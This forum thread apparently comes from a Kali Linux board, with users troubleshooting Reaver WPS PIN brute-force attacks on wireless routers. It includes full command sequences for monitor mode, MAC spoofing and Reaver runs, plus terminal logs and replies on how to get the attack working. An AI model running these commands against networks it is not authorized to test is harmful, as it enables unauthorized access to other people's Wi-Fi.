
Thread: Reaver WPS Timeouts

  1. #1
    Join Date
    2015-Oct
    Location
    United States
    Posts
    18

    Reaver WPS Timeouts

    I am not sure what I'm doing wrong but I can not get reaver to crack my WPS.
    When I issue the command it times out, I'm sitting right next to the router with WPS enabled on channel 1 and the key is 12345670.
    I am about 10ft away from the AP.

    I think my terminal log will be most effective in explaining what's going on:

    Code:
    root@kali:~# ifconfig wlan0 down
    root@kali:~# iwconfig wlan0 mode monitor
    root@kali:~# macchanger -r wlan0
    Current MAC:   XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    Permanent MAC: XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    New MAC:       86:38:61:XX:XX:XX (unknown)
    root@kali:~# airmon-ng check kill
    Killing these processes:
    
      PID Name
      752 dhclient
      947 wpa_supplicant
    
    root@kali:~# ifconfig wlan0 up
    root@kali:~# airmon-ng check kill
    
    root@kali:~# airmon-ng start wlan0
    No interfering processes found
    PHY	Interface	Driver		Chipset
    
    phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n
    		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    		(mac80211 station mode vif disabled for [phy0]wlan0)
    
    
    root@kali:~# airodump-ng --bssid 9XX:XX:XX:XX:XX:XX --wps -c 1 wlan0mon
    
     CH  1 ][ Elapsed: 18 s ][ 2015-10-21 11:11                                         
                                                                                                                            
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                            
     XX:XX:XX:XX:XX:XX  -45   0        6        3    0   1  54e  WPA2 CCMP   PSK  1.0     <length:  7>                      
                                                                                                                            
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                              
                                                                                                                            
    
    root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -w -N -A -P -T 0.5 -x 360 -K 1
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Switching wlan0mon to channel 1
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: (null))
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~#

  2. #2
    Join Date
    2015-Apr
    Posts
    29
    What is the manufacturer of the router?
    Reaver may think I attack no hidden networks.

    If you know the ESSID, then give it to Reaver with -e, --essid=<SSID>

  3. #3
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Tritium
    I am not sure what I'm doing wrong but I can not get reaver to crack my WPS.
    When I issue the command it times out, I'm sitting right next to the router with WPS enabled on channel 1 and the key is 12345670.
    I am about 10ft away from the AP.

    Try this:

    airmon-ng check kill
    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up

    airmon-ng start wlan0

    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up

    reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -w -N -A -P -T 0.5 -x 360 -K 1 --mac=00:11:22:33:44:55
    Last edited by slim76; 2015-10-22 at 12:08.

  4. #4
    Join Date
    2015-Oct
    Location
    texas
    Posts
    6
    Having the same problem. I get this:


    root@kali:~# airmon-ng check
    No interfering processes found
    root@kali:~# ifconfig wlan0 down
    root@kali:~#
    root@kali:~# ifconfig wlan0 hw ether 00:11:22:33:44:55
    root@kali:~# ifconfig wlan0 up
    root@kali:~# airmon-ng start wlan0
    No interfering processes found
    PHY Interface Driver Chipset

    phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187
    (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    (mac80211 station mode vif disabled for [phy0]wlan0)


    root@kali:~# ifconfig wlan0mon down
    root@kali:~# ifconfig wlan0mon hw ether 00:11:22:33:44:55
    SIOCSIFHWADDR: Invalid argument

  5. #5
    Join Date
    2016-Jul
    Posts
    2
    Hi guys, I'm using Kali 2016.1 with everything out of the box: aircrack 1.2 RC3, reaver 1.5.3, etc. My wifi adapter is an Intel 5100 AGN with monitor mode on and packet injection tested with aireplay. But every time I try reaver I keep receiving the M1-M2 messages, then nothing; it says a receive timeout occurred. Then I tried wifite with no success at all. The only thing that seemed to work was the WPS PIN attack, but I had 0/12000 success/ttl with no percentage on the side of it, so I'm guessing it's not working. Then I tried the pixie dust attack, but it does exactly the same as reaver. I kill every PID before airmon-ng to get the wlan0mon on. I even tried an mdk3 attack, but it says the device seems to be invulnerable, so my guess is that the connection drops somewhere and I cannot get the M3, M4, M5, M6 and so get the EAPOL correctly. Even wash -i tells me that I got a lot of bad FCS packets. So guys, please help me here. I'm trying the same wifi as I used to with Ubuntu 12.04, but back then I had the ath9. I'm really desperate here.
    I tried downgrading reaver to 1.4, 1.3 and then back to 1.5.3 with the older libpcap0.8, but with no luck at all. Now tcpdump doesn't work, so no more pixie dust attack.
    I only notice that the process goes faster when I use aireplay to send association, but no luck on any M3, M4, M5 EAPOL messages.

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    You need to know the SSID. Reaver needs the SSID to associate and without it you will continuously fail to associate (Reaver will say it is successful if you use -A, it assumes you are associating by other means).

  7. #7
    Join Date
    2013-Jul
    Posts
    844
    To rev1500

    Try this to avoid the SIOCSIFHWADDR: Invalid argument

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
    airmon-ng start wlan0

    ifconfig wlan0mon down
    iwconfig wlan0mon mode manage
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    sleep 2 # Only needed in a script; not required when typed at the command line
    iwconfig wlan0mon mode monitor
    ifconfig wlan0mon up

    Musket Teams

  8. #8
    Join Date
    2013-Jul
    Posts
    844
    To Slim 76

    There are several errors in your mac changing routines which may be causing you trouble.

    If you wish to mac change you also need to mac change the wlan0mon

    See the routine in the thread above for an example

    You also need to add the spoofed mac address to your reaver command line with the --mac= command

    If your spoofed mac address is left out or the address in the reaver command line is different from the actual spoofed mac address then the reaver attack will fail. You will only get the WPS pin not the WPA key.

    If you use the -r command you will have to note the mac address and add it to the reaver command line.

    Musket Teams

  9. #9
    Join Date
    2016-Jul
    Posts
    17
    Captura de pantalla de 2016-07-28 00-18-03.jpg
    Thanks in advance for the help.

  10. #10
    Join Date
    2016-Jul
    Posts
    17
    I'm kind of new to this....
    and I would like to ask..
    how do you post part of the log....???
    It doesn't let me....

  11. #11
    Join Date
    2016-Jul
    Posts
    1
    Guys, I have done every step you said carefully and this is what I get:
    [+] Waiting for beacon from XX:XX:XX:XX:XX
    [+] Switching wlan0mon to channel 1
    [+] Associated with XX:XX:XX:XX:XX (ESSID: XXX)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    What should I do to fix this, please?
    Also, when I run airmon-ng start my internet goes off. How can I fix this?

  12. #12
    BBCode has some limitations here and doesn't correctly handle the brackets when you use them inside the code option.
    Get rid of the brackets from the reaver stdout; it should let you post your log.
    Do not use check kill to activate monitor mode if you want network manager to work.
    If you have a single wifi interface and you are connected to it you will lose connection anyway.
    Last edited by kcdtv; 2016-07-31 at 17:49.
